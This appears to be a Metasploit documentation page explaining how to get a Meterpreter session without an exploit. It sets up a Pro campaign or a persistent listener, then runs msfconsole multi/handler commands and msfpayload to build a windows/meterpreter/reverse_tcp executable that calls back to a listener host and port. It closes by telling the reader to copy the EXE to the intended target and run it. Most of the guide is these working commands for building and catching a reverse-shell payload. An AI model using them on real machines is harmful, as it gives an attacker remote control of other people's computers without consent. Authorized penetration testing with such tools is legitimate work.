Use Meterpreter Locally Without an Exploit
Create a new project, click on Campaigns, create a new Campaign, enable the USB Campaign and configure the listener port. At this point, save the campaign, start it, then download the executable from the provided link. The session will now appear in the Sessions tab.
Alternatively, access Global Settings from the Administration menu and configure a new Persistent Listener through this interface, choosing the type of payload you want this listener to support (reverse_tcp, reverse_https, etc). Once the listener is setup, see the steps below for the Metasploit Framework to create the executable.
The steps listed below for Metasploit Community and Metasploit Framework can also be used without leveraging the Campaign feature in Metasploit Pro.
Open a Metasploit Console by first launchign the console from the Start Menu on Windows or using the "msfpro" or "msfconsole" links on Linux. Once the console is open, enter the following commands:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.100
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
This will run a handler listener in the background. Change 192.168.0.100 to whatever your machine's IP is, but do not set this to 127.0.0.1 (this is special cased in Metasploit). Once the listener is running, its time to generate the actual payload.
Open a command shell with access to the Metasploit environment. On Windows, this is a link to the System Console, on Linux this is /opt/metasploit-4.1.2/diagnostic_shell. Linux users may not need to do this at all if msfconsole is already within their path.
From the shell, execute the following command:
C:\metasploit > ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 X > payload.exe
Copy this EXE to your intended target and execute it. The session will be visible with the Metasploit Console (or in the Sessions tab if you used one of the commercial or community products to create the listener)